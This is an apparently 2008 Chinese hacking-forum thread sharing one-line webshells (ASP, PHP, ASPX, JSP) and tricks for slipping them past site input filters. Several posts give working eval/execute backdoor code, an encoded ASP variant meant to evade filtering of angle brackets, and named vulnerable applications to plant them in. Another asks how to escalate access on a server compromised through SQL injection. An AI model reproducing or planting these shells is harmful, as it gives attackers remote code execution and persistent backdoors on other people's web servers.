[讨论]一句话木马的绕过过滤技巧 木马, 技巧, 讨论

richy

[讨论]一句话木马的绕过过滤技巧
文章作者：Awolf
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

  一句话木马在拿shell的时候总有很大作用，但是经常遇到这样情况：经过过滤后把我们小马都变了个某样了，让我们小菜素手无策！当然有人会说依情况而定，没错是这样的要灵活变通。这个帖子主要和大家讨论下一些常见的情况和如何绕过防注入的方法！让我们学习学习~~
   asp一句话：
复制内容到剪贴板
代码:
<%executerequest("p")%>
php一句话：
复制内容到剪贴板
代码:
<?php eval($_POST[cmd];?>
aspx一句话：
复制内容到剪贴板
代码:
<%@ Page Language="Jscript" validateRequest="false" %><%Response.Write(eval(Request.Item["w"],"unsafe"));%>
jsp一句话：
复制内容到剪贴板
代码:
＜%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("("f"))).write(request.getParameter("t").getBytes());

%＞
这里主要针对asp和php还有aspx的，这三个比较经常用！
帖子14 精华0 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP 软件项目外包

ring04h
团队执行官

解生

一句话的木马并不只是有这些.
脚本语言中大多数和系统交互的函数都能够用来作为后门.

安全性和可用性是不可逆的.
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1096 小时 注册时间2007-10-23 最后登录2008-7-21 查看详细资料TOP 少女暴富的隐秘（图）

awolf
晶莹剔透§烈日灼然

大梦东莞

恩，没错，只要我们好好分析充分利用 类似一句话木马可做后门的不只这些。
那么我主要想讨论是针对这些的一些常见的变形技术来达到免杀或者跳过过滤来插入小马。。
帖子14 精华0 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP 软件项目外包

xinfulove
晶莹剔透§烈日灼然

赤脚天使

问一句，没具体说怎么饶过过滤呀？漏啦？
帖子7 精华0 积分30 阅读权限40 在线时间19 小时 注册时间2006-6-4 最后登录2008-6-23 查看详细资料TOP

billycrazy
晶莹剔透§烈日灼然

dglemon

关于动易2005 ACCESS 顶部菜单设置 ----特效那里加一句话 被过滤 各位是否有招
帖子23 精华0 积分83 阅读权限40 性别男 在线时间86 小时 注册时间2006-2-10 最后登录2008-7-22 查看详细资料TOP 少女暴富的隐秘（图）

asasok
晶莹剔透§烈日灼然

叶王子

怎么绕，对什么情况使用什么绕法？
帖子4 精华0 积分22 阅读权限40 性别男 在线时间19 小时 注册时间2007-12-31 最后登录2008-6-21 查看详细资料TOP 让女孩一夜变的更有女人味

mlove
mlove

dick

提示: 作者被禁止或删除 内容自动屏蔽
帖子20 精华0 积分-6 阅读权限0 性别男 来自邪恶八进制 在线时间8 小时 注册时间2008-1-8 最后登录2008-4-7 查看详细资料TOP 让女孩一夜变的更有女人味

xiaohao
晶莹剔透§烈日灼然

帅仔

听的不是懂??
帖子2 精华0 积分9 阅读权限40 性别男 在线时间4 小时 注册时间2008-1-9 最后登录2008-5-5 查看详细资料TOP

唐不狐
很黃很暴力

晶莹剔透§烈日灼然

没没

本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的
帖子145 精华2 积分574 阅读权限50 性别男 来自china 在线时间107 小时 注册时间2005-9-27 最后登录2008-7-21 查看个人网站
查看详细资料TOP

awolf
晶莹剔透§烈日灼然

捷达仔

引用:
引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的
恩，这里我只对asp做个简单的变形：
这个是针对于网站过滤了“<”，“>”等我们一句话木马要用到的关键字符，可以这样转换！
asp变形后成为
引用:
┼攠數畣整爠煥敵瑳∨∣┩愾┼砧
这样就绕过了，这个可以用在比如 沸腾注册的插马漏洞，还有现在最新的dvbbs8.1的后他拿shell在圈子设置处的插马。
至于php的还有aspx的还不是很懂，还需要大家帮忙。。。。。
当然asp也不只上面一种，还有很多种，比如转换ASCII码等等。。。。
帖子14 精华0 积分51 阅读权限40 在线时间19 小时 注册时间2007-12-3 最后登录2008-7-22 查看详细资料TOP

seraph1984
晶莹剔透§烈日灼然

超越改

我来发一个我的变形
复制内容到剪贴板
代码:
<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>慧，如果还可以再来一次，我还是愿意被你骗，

帖子4 精华0 积分16 阅读权限40 性别男 在线时间3 小时 注册时间2006-7-17 最后登录2008-1-14 查看详细资料TOP

jxsaqjh
晶莹剔透§烈日灼然

快乐周末

引用:
引用第8楼唐不狐于2008-01-09 16:13发表的 :
本帖最大的遗憾：楼主本身都没有提出任何所知的关于一句话马变形的技术。
对于asp的，我们很熟悉的有lake2大侠的——ansi2unicode以及对比于冰狐的一句话马用javascript写成的
不狐兄说的那篇文章哪里可以找到？jxsaqjh.cn

帖子36 精华0 积分99 阅读权限40 性别男 在线时间15 小时 注册时间2006-10-23 最后登录2008-4-9 查看详细资料TOP

゛小︷帅！﹊
晶莹剔透§烈日灼然

line

复制内容到剪贴板
代码:
<%On Error Resume Next eval request("xsser") %>


帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料TOP

chinaitbo
晶莹剔透§烈日灼然

Ougeng

由于我刚注册账号，不能发贴，只好把我的问题跟贴求助大家了。
问题：拿到了一个SA注入点，通过阿D工具添加了一个管理员账号，用这个远程桌面登陆，问题就在那，能进去但显示跟去掉EXPLORER这个进程关掉一样的蓝色画面，通过ctrl+alt+del打开任务管理器，从上面的运行那里打开了CMD，但用net user 查看账号时，没有阿D添加的那个账号。通过调用MMC里添加active directory 用户和计算机里面的user项才有阿D添加的账号，我在里面把我的账号添加了domain administrator administrator,但还是没权限调用桌面出来。

看来这台机子已经用来做域用户了，但怎么才突破权限，怎么在这台本地登陆呢。通过阿D添加的账号是域账号，而不是本地账号。
帖子4 精华0 积分16 阅读权限40 在线时间1 小时 注册时间2008-1-28 最后登录2008-2-2 查看详细资料TOP

softbug
技术核心组

chc2203

ExecuteGlobal ?论坛地址: http://www.ssk2.cn & www.iisuser.com
帖子287 精华14 积分6821 阅读权限200 性别男 在线时间96 小时 注册时间2005-1-7 最后登录2008-7-22 查看个人网站
查看详细资料TOP

frg87895321
晶莹剔透§烈日灼然

google

<script language=VBScript runat=server>if request(chr(35))<>"" then
response.clear
ExecuteGlobal request(chr(35))
response.end
end if
</script>

这个留着当后门很好
帖子3 精华0 积分5 阅读权限40 在线时间11 小时 注册时间2007-3-5 最后登录2008-7-22 查看详细资料TOP

消失再消失
荣誉会员